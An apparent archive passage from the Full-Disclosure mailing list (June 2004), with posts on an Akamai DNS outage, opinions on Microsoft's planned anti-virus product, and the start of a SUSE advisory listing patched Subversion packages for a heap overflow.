aforementioned malware already and can save us some time with
instructions on how to remove it... thanks in advance.

caveat emptor,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan Nov 11-12 2004 http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Niek Baakman (niekbaakmanhome.nl)
Date: Thu Jun 17 2004 - 03:18:11 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Niek Baakman wrote:

> Hi list,
>
> akamai disappeared from the internet about an hour ago.
> (all their dns servers are dead, hence many companies that
> use akamai are unreachable: microsoft.com/liveupdate.symantec.com
> apple/some search engines)
>
> Does anyone know if it is security-related (ddos, something else).
>
> Regards,
>
> Niek

http://www.computerworld.com/securitytopics/security/story/0,10801,93875,00.html?SKC=security-93875

Regards,

Niek

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] MS Anti Virus?

From: Todd Burroughs (toddhostopia.com)
Date: Thu Jun 17 2004 - 04:04:16 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

They are planning to get into a market that gaurds against the failures
in their own product. I don't like this, as it seems that they are going
to be in a position to intentionally make holes that their "anti-virus"
software will fix. If we had a more competitive market in this type of
software there would be no market for AV software and the AV companies
would be making better operating systems. Remember, Microsoft is a
marketing company and they are very good at it and very powerful.

Educate your friends and family. Unfortunately, there isn't much choice
right now, but someone will do for Linux (or *BSD) what Apple has done.
If Apple was smart, they would make an OS for PCs. Maybe they will...

It's sad that we are wasting so much resources on what should be a
non-problem.

Todd Burroughs
---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 16 Jun 2004, Chris Cappuccio wrote:

> I hate to say this, but I don't think Microsoft software could be any
> worse than Symantec...
>
> Andre Ludwig [andre.ludwiggmail.com] wrote:
> > Think the mafia refers to this as a protection racket...
> >
> > man so much can be made of this its a techy comedy gold mine.
> >
> >
> > "our software sucks so bad that the market for anti virus software for
> > our platform is such a lucrative market that we cant stay out of it"
> >
> > Andre Ludwig CISSP
> >
> > On Wed, 16 Jun 2004 19:41:49 -0400, slacker <leetslackersofthome.net> wrote:
> > >
> > > <snip>
> > > > SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
> > > > Research) is still on track to offer an anti-virus product that will
> > > > compete against similar software offered by Symantec Corp. (SYMC.O:
> > > > Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
> > > > Profile, Research) , the world's largest software maker said late on
> > >
> > > Oh yeah, what's the average delay to release on exploit patches? What makes
> > > me think that they are going to be that slow on releasing AV updates? =P
> > >
> > > slacker
> > >
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> "When it absolutely, positively had to be there yesterday: Temporal Express"
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] SUSE Security Announcement: subversion (SuSE-SA:2004:018)

securitysuse.de
Date: Thu Jun 17 2004 - 04:42:59 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SUSE Security Announcement

        Package: subversion
        Announcement-ID: SuSE-SA:2004:018
        Date: Thursday, Jun 17th 2004 09:30 MEST
        Affected products: 8.1, 8.2, 9.0, 9.1
        Vulnerability Type: remote system compromise
        Severity (1-10): 5
        SUSE default package: no
        Cross References: CAN-2004-0413

    Content of this advisory:
        1) security vulnerability resolved: heap overflow
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
             - icecast
             - sitecopy
             - cadaver
             - OpenOffice_org
             - tripwire
             - postgresql
             - lha
             - XDM
             - mod_proxy
        3) standard appendix (further information)

______________________________________________________________________________

1) problem description, brief discussion, solution, upgrade information

    Subversion is a version control system like the well known CVS.
    The subversion code is vulnerable to a remotely exploitable buffer
    overflow on the heap. The bug appears before any authentication took
    place. An attacker is able to execute arbitray code by abusing this
    vulnerability.

There is no temporary workaround known.

x86 Platform:

    SUSE Linux 9.1:
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/subversion-1.0.0-73.7.i586.rpm
      775edc02ae610d8062e808d37540c0ea
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/subversion-1.0.0-73.7.i586.patch.rpm
      93d2ddd82390857d7c2ed5793d2312eb
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/subversion-1.0.0-73.7.src.rpm
      8498e3e8911260f8f06c285946f12437

    SUSE Linux 9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/subversion-0.27.0-209.i586.rpm
      deeeef548aa11dfe1b176bf5a5af9d75
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/subversion-0.27.0-209.i586.patch.rpm
      38a6d786f0f0b42e68117a277b4db309
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/subversion-0.27.0-209.src.rpm
      0c69c5a9665e75504d2c4bf8c51807a6

    SUSE Linux 8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/subversion-0.17.1-98.i586.rpm
      1fbd241f1dfb9a95f4eb6fe224eb40bb
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/subversion-0.17.1-98.i586.patch.rpm
      b553edab8ea07dac53ad26d147dd029d
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/subversion-0.17.1-98.src.rpm
      89d2b6eedbb67d8e3be5e1c7c334792f

    SUSE Linux 8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/subversion-0.23.0-60.i586.rpm
      3e1d7172bc213bcdb7edc88b7653ab1b
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/subversion-0.23.0-60.i586.patch.rpm
      d4897a9197e3c8518a132a0d64cc41e5
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/subversion-0.23.0-60.src.rpm
      3ebbd71afb51b6becb15f12e813d705a

x86-64 Platform:

    SUSE Linux 9.1:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/subversion-1.0.0-73.7.x86_64.rpm
      da1b75e7cf629b65f20b75295df216d8
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/subversion-1.0.0-73.7.x86_64.patch.rpm
      15ec6b033bc85e22b78b1638f13ffc9b
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/subversion-1.0.0-73.7.src.rpm
      2b738a9a5e0aabcdee60d19b74371580

    SUSE Linux 9.0:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/subversion-0.27.0-209.x86_64.rpm
      af042607c6ad7e55c248f47177e8c166
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/subversion-0.27.0-209.x86_64.patch.rpm
      cbffe53ef02a36d63b71d2f86c17d861
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/subversion-0.27.0-209.src.rpm
      d16a485c5d3983b2b4322405abe3c01a